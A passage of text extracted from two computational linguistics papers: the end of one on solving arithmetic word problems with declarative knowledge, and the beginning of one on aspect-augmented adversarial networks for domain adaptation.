supervision used in Roy and Roth (2017). Many of the annotations can be extracted semi-automatically. The number list is extracted automatically by a num- ber detector, the alignments require human supervi- sion only when the same numeric value is mentioned multiple times in the problem. Most of the rate com- ponent annotations can also be extracted automati- cally, see Roy and Roth (2017) for details. We apply a few heuristics to obtain noisy anno- Problem: Mrs. Hilt baked pies last weekend for a holiday dinner. She baked 16 pecan pies and 14 apple pies. If she wants to arrange all of the pies in rows of 5 pies each, how many rows will she have? Number List: 16, 14, 5 Solution: (16[1] + 14[2])/5[3] = 6 Rates: 5 Figure 2: Annotations in our dataset. Number List refers to the numbers detected in the problem. The subscripts in the solution indicate the position of the numbers in the number list. tations for the math concepts for operations. Con- sider the case for combining two numbers num1 and num2, by operation o. We apply the following rules: 1. If we detect an explicit math pattern in the neighborhood of num1 or num2, we assign concept ko to be Explicit Math. 2. If o is multiplication or division, and one of num1 or num2 has a rate component, we as- sign ko to be Dimensional Analysis. 3. If o is addition or subtraction, we check if the dependent verb of both numbers are identical. If they are, we assign ko to be a Part-Whole re- lationship; otherwise, we assign it to be Trans- fer. We extract the dependent verb using the Stanford dependency parser (Chen and Man- ning, 2014). The annotations obtained via these rules are of course not perfect. We could not detect certain uncommon rate patterns like “dividing the cost 4 ways”, and “I read the same number of books 4 days running”. There were part-whole relationships ex- hibited with complementary verbs, as in “I won 4 games, and lost 3.”. Both of these cases lead to noisy math concept annotations. However, we tested a small sample of these anno- tations, and found less than 5% of them to be wrong. As a result, we assume these annotations to be cor- rect in our problem formulation. 5.2 Features We use dependency parse labels and a small set of rules to extract subject, indirect object, depen- dent verb, unit and rate component of each number 166 mentioned in the problem. Details of these extrac- tions can be found in the released codebase. Us- ing these extractions, we define two feature func- tions φk(x,ko) and φr(x,ro), where x is the in- put word problem, and ko and ro are the concept and the declarative rule for operation o respectively. φr(x,r o) constitutes the following features: 1. If ro contains Coref(·) function, we add fea- tures related to similarity of the arguments of Coref(·) (jaccard similarity score and presence of pronoun in one of the arguments). 2. For part-whole relationships, we add indica- tors for a list of words like “remaining”, “rest”, “either”, “overall”, “total”, conjoined with the part-whole function in ro (Hyponymy, Hyper- nymy, Sibling). 3. Unigrams from the neighborhood of numbers being combined. Finally, φk(x,ko) generates the following features: 1. If ko is related to dimensional analysis, we add features indicating the presence of a rate com- ponent in the combining numbers. 2. If ko is part-whole, we add features indicating whether the verbs of combining numbers are identical. Note that these features capture several interpretable functions like coreference, hyponymy, etc. We do not learn three components of our system – verb classification for transfer knowledge, catego- rization of explicit math terms, and irrelevant num- ber detection. For verb classification, we use a seed list of around 10 verbs for each category. Given a new verb v, we choose the most similar verb v′ from the seed lists according to the GloVe vector (Pen- nington et al., 2014) based similarity . We assign v the category of v′. This can be replaced by a learned component (Hosseini et al., 2014). However we found the seed list based categorization worked well in most cases. For explicit math, we check for a small list of patterns to detect and categorize math terms. Note that for both the cases above, we still have to learn Coref(·) function to determine the fi- nal operation. Finally, to detect irrelevant numbers (numbers which are not used in the solution), we use a set of rules based on the units of numbers. Again, this can be replaced by a learned model (Roy and Roth, 2015). 6 Experiments 6.1 Results on Existing Dataset We first evaluate our approach on the existing datasets of AllArith, AllArithLex, and AllAr- ithTmpl (Roy and Roth, 2017). AllArithLex and Al- lArithTmpl are subsets of the AllArith dataset, cre- ated to test the robustness to new vocabulary, and new equation forms respectively. We compare to the top performing systems for arithmetic word prob- lems. They are as follows: 1. TEMPLATE : Template based algebra word problem solver of Kushman et al. (2014). 2. LCA++ : System of Roy and Roth (2015) based on lowest common ancestors of math expres- sion trees. 3. UNITDEP: Unit dependency graph based solver of Roy and Roth (2017). We refer to our approach as KNOWLEDGE. For all solvers, we use the system released by the respec- tive authors. The system of TEMPLATE expects an equation as the answer, whereas our dataset contains only math expressions. We converted expressions to equations by introducing a single variable and as- signing the math expression to it. For example, an expression “(2 + 3)” gets converted to “X = (2 + 3)”. The first few columns of Table 3 shows the per- formance of the systems on the aforementioned datasets1. The performance of KNOWLEDGE is on par or lower than some of the existing systems. We analyzed the systems, and found most of them to not be robust to perturbations of the problem text; Table 4 shows a few examples. We further ana- lyzed the datasets, and identified several biases in the problems (in both train and test). Systems which remember these biases get an undue advantage in evaluation. For example, the verb “give” only ap- pears with subtraction, and hence the models are 1Results on the AllArith datasets are slightly different from (Roy and Roth, 2017), since we fixed several ungrammatical sentences in the dataset 167 System AllArith AllArith Lex AllArith Tmpl Aggregate Aggregate Lex Aggregate Tmpl Train on AllArith, Test on Perturb TEMPLATE 71.96 64.09 70.64 54.62 45.05 54.69 24.2 LCA++ 78.34 66.99 75.66 65.21 53.62 63.0 43.57 UNITDEP 79.67 71.33 77.11 69.9 57.51 68.64 46.29 KNOWLEDGE 77.86 72.53 74.7 73.32∗ 66.63∗ 68.62 65.66∗ Table 3: Accuracy in solving arithmetic word problems. All columns except the last report 5-fold cross validation results. ∗ indicates statistically significant improvement (p = 0.05) over second highest score in the column. Problem Systems which solved correctly Trained on AllArith Trained on Aggregate Adam has 70 marbles. Adam gave 27 marbles to Sam. How many marbles does Adam have now? TEMPLATE, UNITDEP, LCA, KNOWLEDGE LCA, UNITDEP, KNOWLEDGE Adam has 70 marbles. Sam gave 27 marbles to Adam. How many marbles does Adam have now? KNOWLEDGE TEMPLATE, KNOWLEDGE Adam has 5 marbles. Sam has 6 more marbles than Adam. How many marbles does Sam have? LCA, UNITDEP, KNOWLEDGE LCA, UNITDEP, KNOWLEDGE Adam has 11 marbles. Adam has 6 more marbles than Sam. How many marbles does Sam have? TEMPLATE, KNOWLEDGE TEMPLATE, KNOWLEDGE Table 4: Pairs of pertubed problems, along with the systems which get them correct learning an erroneous correlation of “give” with sub- traction. Since the test also exhibits the same bias, these systems get all the “give”-related questions correct. However, they fail to solve the problem in Table 4, where “give” results in addition. We also tested KNOWLEDGE on the addition subtraction problems dataset released by Hosseini et al. (2014). It achieved a cross validation accuracy of 77.19%, which is competitive with the state of the art accu- racy of 78% achieved with the same level of supervi- sion. The system of Mitra and Baral (2016) achieved 86.07% accuracy on this dataset, but requires rich annotations for formulas and alignment of numbers to formulas. 6.2 New Dataset Creation In order to remove the aforementioned biases from the dataset, we augment it with new word problems collected via a crowdsourcing platform. These new word problems are created by perturbing the original problems minimally, such that the answer is differ- ent from the original problem. For each word prob- lem p with an answer expression a in our original dataset AllArith, we replace one operation in a to create a new math expression a′. We ask annotators to modify problem p minimally, such that a′ is now the solution to the modified word problem. We create a′ from a either by replacing an addi- tion with subtraction or vice versa, or by replacing multiplication with division or vice versa. We do not replace addition and subtraction with multiplication or division, since there might not be an easy per- turbation that supports this conversion. We only al- lowed perturbed expressions which evaluate to val- ues greater than 1. For example, we generate the expression “(3+2)” from “(3-2)”; we generated ex- pressions “(10+2)/4” and “(10-2)*4” for the expres- sion “(10-2)/4”. We generate all possible perturbed expressions for a given answer expression, and ask for problem text modification for each one of them. We show the annotators the original problem text p paired with a perturbed answer a′. The instructions advised them to copy over the given problem text, and modify it as little as possible so that the given math expression is now the solution to this modified problem. They were also instructed not to add or delete the numbers mentioned in the problem. If the original problem mentions two “3”s and one “2”, the 168 modified problem should also contain two “3”s and one “2”. We manually pruned problems which did not yield the desired solution a′, or were too different from the input problem p. This procedure gave us a set of 661 new word problems, which we refer to as Perturb. Finally we augment AllArith with the problems of Perturb, and call this new dataset Ag- gregate. Aggregate has a total of 1492 problems. The addition of the Perturb problems ensures that the dataset now has problems with similar lex- ical items generating different answers. This mini- mizes the bias that we discussed in subsection 6.1. To quantify this, consider the probability distribu- tion over operations for a quantity q, given that word w is present in the neighborhood of q. For an un- biased dataset, you will expect the entropy of this distribution to be high, since the presence of a sin- gle word in a number neighborhood will seldom be completely informative for the operation. We com- pute the average of this entropy value over all num- bers and neighborhood words in our dataset. AllAr- ith and Perturb have an average entropy of 0.34 and 0.32 respectively, whereas Aggregate’s average en- tropy is 0.54, indicating that, indeed, the complete data set is significantly less biased. 6.3 Generalization from Biased Dataset First, we evaluate the ability of systems to general- ize from biased datasets. We train all systems on AllArith, and test them on Perturb (which was cre- ated by perturbing AllArith problems). The last col- umn of Table 3 shows the performance of systems in this setting. KNOWLEDGE outperforms all other systems in this setting with around 19% absolute im- provement over UNITDEP. This shows that declara- tive knowledge allows the system to learn the correct abstractions, even from biased datasets. 6.4 Results on the New Dataset Finally, we evaluate the systems on the Aggre- gate dataset. Following previous work (Roy and Roth, 2017), we compute two subsets of Aggregate comprising 756 problems each, using the MAWPS (Koncel-Kedziorski et al., 2016) system. The first, called AggregateLex, is one with low lexical repeti- tions, and the second called AggregateTmpl is one with low repetitions of equation forms. We also evaluate on these two subsets on a 5-fold cross val- idation. Columns 4-6 of Table 3 show the perfor- mance of systems on this setting. KNOWLEDGE sig- nificantly o utperforms o ther s ystems o n Aggregate and AggregateLex, and is similar to UNITDEP on AggregateTmpl. There is a 9% absolute improve- ment on AggregateLex, showing that KNOWLEDGE is significantly m ore r obust t o l ow l exical overlap between train and test. The last column of Table 4 also shows that the other systems do not learn the right abstraction, even when trained on Aggregate. 6.5 Analysis Coverage of the Declarative Rules We chose math concepts and declarative rules based on their prevalance in arithmetic word problems. We found that the four concepts introduced in this paper cover almost all the problems in our dataset; only missing 4 problems involving application of area formulas. We also checked earlier arithmetic problem datasets from the works of Hosseini et al. (2014); Roy and Roth (2015), and found that the math concepts and declarative rules introduced in this paper cover all their problems. A major challenge in applying these concepts and rules to algebra word problems is the use of variables in constructing equations. Variables are often im- plicitly described, and it is difficult to extract units, dependent verbs, associated subjects and objects for the variables. However, we need these extractions in order to apply our declarative rules to combine vari- ables. There has been some work to extract meaning of variables (Roy et al., 2016) in algebra word prob- lems; an extension of this can possibly support the application of rules in algebra word problems. We leave this exploration to future work. Higher standard word problems often require the application of math formulas like ones related to area, interest, probability, etc. Extending our ap- proach to handle such problems will involve en- coding math formulas in terms of concepts and rules, as well as adding concept specific features to the learned predictors. The declarative rules under the Explicit Math category currently handles sim- ple cases; this set needs to be augmented to handle complex number word problems found in algebra datasets. Gains achieved by Declarative Rules Table 5 169 Isabel had 2 pages of math homework and 4 pages of reading homework. If each page had 5 prob- lems on it, how many problems did she have to complete total ? Tim’s cat had kittens. He gave 3 to Jessica and 6 to Sara . He now has 9 kittens . How many kittens did he have to start with ? Mrs. Snyder made 86 heart cookies. She made 36 red cookies, and the rest are pink. How many pink cookies did she make? Table 5: Examples which KNOWLEDGE gets correct, but UNITDEP does not. shows examples of problems which KNOWLEDGE gets right, but UNITDEP does not. The gains can be attributed to the injection of declarative knowl- edge. Earlier systems like UNITDEP try to learn the reasoning required for these problems from the data alone. This is often difficult in the presence of lim- ited data, and noisy output from NLP tools. In con- trast, we learn probabilistic models for interpretable functions like coreference, hyponymy, etc., and then use declarative knowledge involving these functions to perform reasoning. This reduces the complexity of the target function to be learned considerably, and hence we end up with a more robust model. Effect of Beam Size We used a beam size of 1000 in all our experiments. However, we found that vary- ing the beam size does not effect the performance significantly. Even lowering the beam size to 100 reduced performance by only 1%. Weakness of Approach A weakness of our method is the requirement to have all relevant declarative knowledge during training. Many of the component functions (like coreference) are learned through la- tent alignments with no explicit annotations. If too many problems are not explained by the knowledge, the model will learn noisy alignments for the com- ponent functions. Table 6 shows the major categories of errors with examples. 26% of the errors are due to extraneous number detection. We use a set of rules based on units of numbers, to detect such irrelevant numbers. As a result, we fail to detect numbers which are ir- relevant due to other factors, like associated entities, or associated verb. We can potentially expand our rule based system to detect those, or replace it by a learned module like Roy and Roth (2015). Another Irrelevant Number Detection (26%) Sally had 39 baseball cards, and 9 were torn. Sara bought 24 of Sally’s baseball cards . How many baseball cards does Sally have now? Parsing Rate Component (26%) Mary earns $46 cleaning a home. How many homes did she clean, if she made 276 dollars? Coreference (22%) There are 5 people on the Green Bay High track team. If a relay race is 150 meters long, how far will each team member have to run? Table 6: Examples of errors made by KNOWLEDGE major source of errors is parsing of rate components; that is, understanding “earns $46 cleaning a home” should be normalized to “$46 per home”. Although we learn a model for coreference function, we make several mistakes related to coreference. For the ex- ample in Table 6, we fail to detect the coreference between “team member” and “people”. 7 Conclusion In this paper, we introduce a framework for incorpo- rating declarative knowledge in word problem solv- ing. Our knowledge based approach outperforms all other systems, and also learns better abstractions from biased datasets. Given that the variability in text is much larger than the number of declarative rules that governs Math word problems, we believe that this is a good way to introduce Math knowledge to a natural language understanding system. Conse- quently, future work will involve extending our ap- proach to handle a wider range of word problems, possibly by supporting better grounding of implicit variables and including a larger number of math con- cepts and declarative rules. An orthogonal explo- ration direction is to apply these techniques to gen- erate summaries of financial or sports news, or gen- erate statistics of war or gun violence deaths from news corpora. A straightforward approach can be to augment news documents with a question asking for the required information, and treating this aug- mented news document as a math word problem. Code and dataset are available at https:// github.com/CogComp/arithmetic. 170 Acknowledgments We are grateful to anonymous reviewers for their in- sightful comments. This work is funded by DARPA under agreement number FA8750-13-2-0008, and a grant from the Allen Institute for Artificial Intelli- gence (allenai.org). References Yonatan Bisk and Julia Hockenmaier. 2012. Simple ro- bust grammar induction with combinatory categorial grammars. In Proceedings of the Twenty-Sixth Confer- ence on Artificial Intelligence (AAAI-12), pages 1643– 1649, Toronto, Canada, July. Ming-Wei Chang, Lev Ratinov, and Dan Roth. 2007. Guiding semi-supervision with constraint- driven learning. In Proceedings of the Annual Meet- ing of the Association for Computational Linguistics (ACL), pages 280–287, Prague, Czech Republic, 6. Association for Computational Linguistics. Ming-Wei Chang, Lev Ratinov, and Dan Roth. 2012. Structured learning with constrained conditional mod- els. Machine Learning, 88(3):399–431, 6. Danqi Chen and Christopher D. Manning. 2014. A fast and accurate dependency parser using neural networks. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), pages 740–750, Doha, Qatar, October. Association for Computational Linguistics. James Clarke, Dan Goldwasser, Ming-Wei Chang, and Dan Roth. 2010. Driving semantic parsing from the world’s response. In Proc. of the Conference on Com- putational Natural Language Learning (CoNLL), 7. Gerald DeJong. 1993. Investigating explanation-based learning. Kluwer International Series in Engineering and Computer Science. Kluwer Academic Publishers. Gerald DeJong. 2014. Explanation-based learning. In T. Gonzalez, J. Diaz-Herrera, and A. Tucker, editors, CRC Computing Handbook: Computer Science and Software Engineering, pages 66.1–66.26. CRC Press, Boca Raton. Kuzman Ganchev, Joao Graça, Jennifer Gillenwater, and Ben Taskar. 2010. Posterior regularization for struc- tured latent variable models. Journal of Machine Learning Research. Kevin Gimpel and Mohit Bansal. 2014. Weakly- supervised learning with cost-augmented contrastive estimation. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Process- ing (EMNLP), pages 1329–1341, Doha, Qatar, Octo- ber. Association for Computational Linguistics. Mark Hopkins, Cristian Petrescu-Prahova, Roie Levin, Ronan Le Bras, Alvaro Herrasti, and Vidur Joshi. 2017. Beyond sentential semantic parsing: Tack- ling the math SAT with a cascade of tree transducers. In Proceedings of the 2017 Conference on Empirical Methods in Natural Language Processing, pages 806– 815, Copenhagen, Denmark, September. Association for Computational Linguistics. Mohammad Javad Hosseini, Hannaneh Hajishirzi, Oren Etzioni, and Nate Kushman. 2014. Learning to solve arithmetic word problems with verb categorization. In Proceedings of the Conference on Empirical Methods for Natural Language Processing (EMNLP). Danqing Huang, Shuming Shi, Chin-Yew Lin, and Jian Yin. 2017. Learning fine-grained expressions to solve math word problems. In Proceedings of the 2017 Con- ference on Empirical Methods in Natural Language Processing, pages 816–825, Copenhagen, Denmark, September. Association for Computational Linguis- tics. Robin Jia and Percy Liang. 2017. Adversarial exam- ples for evaluating reading comprehension systems. In Proceedings of the 2017 Conference on Empiri- cal Methods in Natural Language Processing, pages 2021–2031. Association for Computational Linguis- tics, September. Daniel Khashabi, Tushar Khot, Ashish Sabharwal, Peter Clark, Oren Etzioni, and Dan Roth. 2016. Ques- tion answering via integer programming over semi- structured knowledge. In Proceedings of the Interna- tional Joint Conference on Artificial Intelligence (IJ- CAI). Rik Koncel-Kedziorski, Hannaneh Hajishirzi, Ashish Sabharwal, Oren Etzioni, and Siena Ang. 2015. Pars- ing Algebraic Word Problems into Equations. Trans- actions of the Association of Computational Linguis- tics. Rik Koncel-Kedziorski, Subhro Roy, Aida Amini, Nate Kushman, and Hannaneh Hajishirzi. 2016. MaWPS: A math word problem repository. In Proceedings of the 2016 Conference of the North American Chapter of the Association for Computational Linguistics. Nate Kushman, Luke Zettlemoyer, Regina Barzilay, and Yoav Artzi. 2014. Learning to automatically solve algebra word problems. In Proceedings of the Annual Meeting of the Association for Computational Linguis- tics (ACL), pages 271–281. Percy Liang, Michael Jordan, and Dan Klein. 2011. Learning dependency-based compositional semantics. In Proceedings of the Annual Meeting of the Associa- tion for Computational Linguistics (ACL). Wang Ling, Dani Yogatama, Chris Dyer, and Phil Blun- som. 2017. Program induction by rationale gener- ation: Learning to solve and explain algebraic word 171 problems. In Proceedings of the 55th Annual Meeting of the Association for Computational Linguistics. Takuya Matsuzaki, Takumi Ito, Hidenao Iwane, Hirokazu Anai, and Noriko H. Arai. 2017. Semantic parsing of pre-university math problems. In Proceedings of the 55th Annual Meeting of the Association for Compu- tational Linguistics (Volume 1: Long Papers), pages 2131–2141, Vancouver, Canada, July. Association for Computational Linguistics. Arindam Mitra and Chitta Baral. 2016. Learning to use formulas to solve simple arithmetic problems. In Pro- ceedings of the 54th Annual Meeting of the Association for Computational Linguistics. Tahira Naseem, Harr Chen, Regina Barzilay, and Mark Johnson. 2010. Using universal linguistic knowl- edge to guide grammar induction. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, EMNLP ’10, pages 1234–1244, Stroudsburg, PA, USA. Association for Computational Linguistics. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. GloVe: Global vectors for word rep- resentation. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Process- ing (EMNLP). Dan Roth and Wen-Tau Yih. 2004. A linear program- ming formulation for global inference in natural lan- guage tasks. In Hwee Tou Ng and Ellen Riloff, edi- tors, Proceedings of the Conference on Computational Natural Language Learning (CoNLL), pages 1–8. As- sociation for Computational Linguistics. Subhro Roy and Dan Roth. 2015. Solving general arith- metic word problems. In Proc. of the Conference on Empirical Methods in Natural Language Processing (EMNLP). Subhro Roy and Dan Roth. 2017. Unit dependency graph and its application to arithmetic word problem solving. In Proceedings of the Conference on Artifi- cial Intelligence (AAAI). Subhro Roy, Shyam Upadhyay, and Dan Roth. 2016. Equation parsing: Mapping sentences to grounded equations. In Proceedings of the Conference on Empirical Methods in Natural Language Processing (EMNLP). Shuming Shi, Yuehui Wang, Chin-Yew Lin, Xiaojiang Liu, and Yong Rui. 2015. Automatically solving num- ber word problems by semantic parsing and reasoning. In Empirical Methods in Natural Language Process- ing. Noah Smith and Jason Eisner. 2006. Annealing struc- tural bias in multilingual weighted grammar induction. In Proceedings of the Annual Meeting of the Associ- ation for Computational Linguistics (ACL), ACL-44, pages 569–576, Stroudsburg, PA, USA. Association for Computational Linguistics. Shyam Upadhyay, Ming-Wei Chang, Kai-Wei Chang, and Wen-tau Yih. 2016. Learning from explicit and implicit supervision jointly for algebra word problems. In Proceedings of the 2016 Conference on Empirical Methods in Natural Language Processing. Lipu Zhou, Shuaixiang Dai, and Liwei Chen. 2015. Learn to solve algebra word problems using quadratic programming. In Proceedings of the 2015 Conference on Empirical Methods in Natural Language Process- ing. 172 work_mxyrjrwatzbxze2i7rhlholzum ---- Aspect-augmented Adversarial Networks for Domain Adaptation Yuan Zhang, Regina Barzilay, and Tommi Jaakkola Computer Science and Artificial Intelligence Laboratory Massachusetts Institute of Technology {yuanzh, regina, tommi}@csail.mit.edu Abstract We introduce a neural method for transfer learning between two (source and target) clas- sification tasks or aspects over the same do- main. Rather than training on target la- bels, we use a few keywords pertaining to source and target aspects indicating sentence relevance instead of document class labels. Documents are encoded by learning to em- bed and softly select relevant sentences in an aspect-dependent manner. A shared classi- fier is trained on the source encoded docu- ments and labels, and applied to target en- coded documents. We ensure transfer through aspect-adversarial training so that encoded documents are, as sets, aspect-invariant. Ex- perimental results demonstrate that our ap- proach outperforms different baselines and model variants on two datasets, yielding an improvement of 27% on a pathology dataset and 5% on a review dataset.1 1 Introduction Many NLP problems are naturally multitask classi- fication problems. For instance, values extracted for different fields from the same document are often dependent as they share the same context. Exist- ing systems rely on this dependence (transfer across fields) to improve accuracy. In this paper, we con- sider a version of this problem where there is a clear dependence between two tasks but annotations are available only for the source task. For example, 1The code is available at https://github.com/ yuanzh/aspect_adversarial. Pathology report: • Final diagnosis: BREAST (LEFT) … Invasive ductal carcinoma: identified. Carcinoma tumor size: num cm. Grade: 3. … Lymphatic vessel invasion: identified. Blood vessel invasion: Suspicious. Margin of invasive carcinoma … Diagnosis results: Source (IDC): Positive Target (LVI): Positive Figure 1: A snippet of a breast pathology report with diagnosis results for two types of disease (aspects): carcinoma (IDC) and lymph invasion (LVI). Note how the same phrase indicating positive results (e.g. identified) is applicable to both aspects. A transfer model learns to map other key phrases (e.g. Grade 3) to such shared indicators. the target goal may be to classify pathology reports (shown in Figure 1) for the presence of lymph in- vasion but training data are available only for car- cinoma in the same reports. We call this problem aspect transfer as the objective is to learn to classify examples differently, focusing on different aspects, without access to target aspect labels. Clearly, such transfer learning is possible only with auxiliary in- formation relating the tasks together. The key challenge is to articulate and incorpo- rate commonalities across the tasks. For instance, in classifying reviews of different products, sentiment words (referred to as pivots) can be shared across the products. This commonality enables one to align feature spaces across multiple products, enabling useful transfer (?). Similar properties hold in other contexts and beyond sentiment analysis. Figure 1 515 Transactions of the Association for Computational Linguistics, vol. 5, pp. 515–528, 2017. Action Editor: Hal Daumé III . Submission batch: 12/2016; Revision batch: 6/2017; Published 12/2017. c©2017 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. shows that certain words and phrases like “identi- fied”, which indicates the presence of a histologi- cal property, are applicable to both carcinoma and lymph invasion. Our method learns and relies on such shared indicators, and utilizes them for effec- tive transfer. The unique feature of our transfer problem is that both the source and the target classifiers operate over the same domain, i.e., the same examples. In this setting, traditional transfer methods will always pre- dict the same label for both aspects and thus lead- ing to failure. Instead of supplying the target classi- fier with direct training labels, our approach builds on a secondary relationship between the tasks using aspect-relevance annotations of sentences. These relevance annotations indicate a possibility that the answer could be found in a sentence, not what the answer is. One can often write simple keyword rules that identify sentence relevance to a particular as- pect through representative terms, e.g., specific hor- monal markers in the context of pathology reports. Annotations of this kind can be readily provided by domain experts, or extracted from medical literature such as codex rules in pathology (Pantanowitz et al., 2008). We assume a small number of relevance an- notations (rules) pertaining to both source and target aspects as a form of weak supervision. We use this sentence-level aspect relevance to learn how to en- code the examples (e.g., pathology reports) from the point of view of the desired aspect. In our approach, we construct different aspect-dependent encodings of the same document by softly selecting sentences relevant to the aspect of interest. The key to effective transfer is how these encodings are aligned. This encoding mechanism brings the problem closer to the realm of standard domain adaptation, where the derived aspect-specific representations are considered as different domains. Given these rep- resentations, our method learns a label classifier shared between the two domains. To ensure that it can be adjusted only based on the source class la- bels, and that it also reasonably applies to the tar- get encodings, we must align the two sets of en- coded examples.2 Learning this alignment is pos- 2This alignment or invariance is enforced on the level of sets, not individual reports; aspect-driven encoding of any specific report should remain substantially different for the two tasks since the encoded examples are passed on to the same classifier. sible because, as discussed above, some keywords are directly transferable and can serve as anchors for constructing this invariant space. To learn this invariant representation, we introduce an adversar- ial domain classifier analogous to the recent suc- cessful use of adversarial training in computer vi- sion (Ganin and Lempitsky, 2014). The role of the domain classifier (adversary) is to learn to distin- guish between the two types of encodings. During training we update the encoder with an adversarial objective to cause the classifier to fail. The encoder therefore learns to eliminate aspect-specific infor- mation so that encodings look invariant (as sets) to the classifier, thus establishing aspect-invariance en- codings and enabling transfer. All three components in our approach, 1) aspect-driven encoding, 2) clas- sification of source labels, and 3) domain adversary, are trained jointly (concurrently) to complement and balance each other. Adversarial training of domain and label classi- fiers can be challenging to stabilize. In our setting, sentences are encoded with a convolutional model. Feedback from adversarial training can be an un- stable guide for how the sentences should be en- coded. To address this issue, we incorporate an ad- ditional word-level auto-encoder reconstruction loss to ground the convolutional processing of sentences. We empirically demonstrate that this additional ob- jective yields richer and more diversified feature rep- resentations, improving transfer. We evaluate our approach on pathology reports (aspect transfer) as well as on a more standard re- view dataset (domain adaptation). On the pathology dataset, we explore cross-aspect transfer across dif- ferent types of breast disease. Specifically, we test on six adaptation tasks, consistently outperforming all other baselines. Overall, our full model achieves 27% and 20.2% absolute improvement arising from aspect-driven encoding and adversarial training re- spectively. Moreover, our unsupervised adaptation method is only 5.7% behind the accuracy of a super- vised target model. On the review dataset, we test adaptations from hotel to restaurant reviews. Our model outperforms the marginalized denoising au- toencoder (Chen et al., 2012) by 5%. Finally, we examine and illustrate the impact of individual com- ponents on the resulting performance. 516 2 Related Work Domain Adaptation for Deep Learning Exist- ing approaches commonly induce abstract represen- tations without pulling apart different aspects in the same example, and therefore are likely to fail on the aspect transfer problem. The majority of these prior methods first learn a task-independent representa- tion, and then train a label predictor (e.g. SVM) on this representation in a separate step. For ex- ample, earlier researches employ a shared autoen- coder (Glorot et al., 2011; Chopra et al., 2013) to learn a cross-domain representation. Chen et al. (2012) further improve and stabilize the represen- tation learning by utilizing marginalized denoising autoencoders. Later, Zhou et al. (2016) propose to minimize domain-shift of the autoencoder in a linear data combination manner. Other researches have fo- cused on learning transferable representations in an end-to-end fashion. Examples include using trans- duction learning for object recognition (Sener et al., 2016) and using residual transfer networks for image classification (Long et al., 2016). In contrast, we use adversarial training to encourage learning domain- invariant features in a more explicit way. Our ap- proach offers another two advantages over prior work. First, we jointly optimize features with the final classification task while many previous works only learn task-independent features using autoen- coders. Second, our model can handle traditional domain transfer as well as aspect transfer, while pre- vious methods can only handle the former. Adversarial Learning in Vision and NLP Our approach closely relates to the idea of domain- adversarial training. Adversarial networks were originally developed for image generation (Good- fellow et al., 2014; Makhzani et al., 2015; Sprin- genberg, 2015; Radford et al., 2016; Taigman et al., 2016), and were later applied to domain adaptation in computer vision (Ganin and Lempitsky, 2014; Ganin et al., 2015; Bousmalis et al., 2016; Tzeng et al., 2014) and speech recognition (Shinohara, 2016). The core idea of these approaches is to promote the emergence of invariant image features by optimizing the feature extractor as an adversary against the do- main classifier. While Ganin et al. (2015) also apply this idea to sentiment analysis, their practical gains have remained limited. Our approach presents two main departures. In computer vision, adversarial learning has been used for transferring across domains, while our method can also handle aspect transfer. In addition, we in- troduce a reconstruction loss which results in more robust adversarial training. We believe that this for- mulation will benefit other applications of adversar- ial training, beyond the ones described in this paper. Semi-supervised Learning with Keywords In our work, we use a small set of keywords as a source of weak supervision for aspect-relevance scoring. This relates to prior work on utilizing prototypes and seed words in semi-supervised learning (Haghighi and Klein, 2006; Grenager et al., 2005; Chang et al., 2007; Mann and McCallum, 2010; Jagarlamudi et al., 2012; Li et al., 2012; Eisenstein, 2017). All these prior approaches utilize prototype annotations primarily targeting model bootstrapping but not for learning representations. In contrast, our model uses provided keywords to learn aspect-driven encoding of input examples. Attention Mechanism in NLP One may view our aspect-relevance scorer as a sentence-level “semi-supervised attention”, in which relevant sen- tences receive more attention during feature extrac- tion. While traditional attention-based models typ- ically induce attention in an unsupervised manner, they have to rely on a large amount of labeled data for the target task (Bahdanau et al., 2015; Rush et al., 2015; Chen et al., 2015; Cheng et al., 2016; Xu et al., 2015; Xu and Saenko, 2016; Yang et al., 2016; Martins and Astudillo, 2016; Lei et al., 2016). Unlike these methods, our approach assumes no label annotations in the target domain. Other re- searches have focused on utilizing human-provided rationales as “supervised attention” to improve pre- diction (Zaidan et al., 2007; Marshall et al., 2015; Zhang et al., 2016; Brun et al., 2016). In contrast, our model only assumes access to a small set of key- words as a source of weak supervision. Moreover, all these prior approaches focus on in-domain clas- sification. In this paper, however, we study the task in the context of domain adaptation. Multitask Learning Existing multitask learn- ing methods focus on the case where supervision is available for all tasks. A typical architecture in- volves using a shared encoder with a separate clas- 517 sifier for each task. (Caruana, 1998; Pan and Yang, 2010; Collobert and Weston, 2008; Liu et al., 2015; Bordes et al., 2012). In contrast, our work assumes labeled data only for the source aspect. We train a single classifier for both aspects by learning aspect- invariant representation that enables the transfer. 3 Problem Formulation We begin by formalizing aspect transfer with the idea of differentiating it from standard domain adap- tation. In our setup, we have two classification tasks called the source and the target tasks. In contrast to source and target tasks in domain adaptation, both of these tasks are defined over the same set of ex- amples (here documents, e.g., pathology reports). What differentiates the two classification tasks is that they pertain to different aspects in the examples. If each training document were annotated with both the source and the target aspect labels, the problem would reduce to multi-label classification. However, in our setting training labels are available only for the source aspect so the goal is to solve the target task without any associated training label. To fix the notation, let d = {si}|d|i=1 be a document that consists of a sequence of |d| sentences si. Given a document d, and the aspect of interest, we wish to predict the corresponding aspect-dependent class label y (e.g., y ∈ {−1, 1}). We assume that the set of possible labels are the same across aspects. We use ysl;k to denote the k-th coordinate of a one-hot vector indicating the correct training source aspect label for document dl. Target aspect labels are not available during training. Beyond labeled documents for the source aspect {dl,ysl }l∈L, and shared unlabeled documents for source and target aspects {dl}l∈U , we assume fur- ther that we have relevance scores pertaining to each aspect. The relevance is given per sentence, for some subset of sentences across the documents, and indicates the possibility that the answer for that doc- ument would be found in the sentence but without indicating which way the answer goes. Relevance is always aspect dependent yet often easy to provide in the form of simple keyword rules. We use rai ∈ {0, 1} to denote the given relevance label pertaining to aspect a for sentence si. Only a small subset of sentences in the training set have as- sociated relevance labels. Let R = {(a,l, i)} de- note the index set of relevance labels such that if (a,l, i) ∈ R then aspect a’s relevance label ral,i is available for the ith sentence in document dl. In our case relevance labels arise from aspect-dependent keyword matches. rai = 1 when the sentence con- tains any keywords pertaining to aspect a and rai = 0 if it has any keywords of other aspects.3 Separate subsets of relevance labels are available for each as- pect as the keywords differ. The transfer that is sought here is between two tasks over the same set of examples rather than be- tween two different types of examples for the same task as in standard domain adaptation. However, the two formulations can be reconciled if full relevance 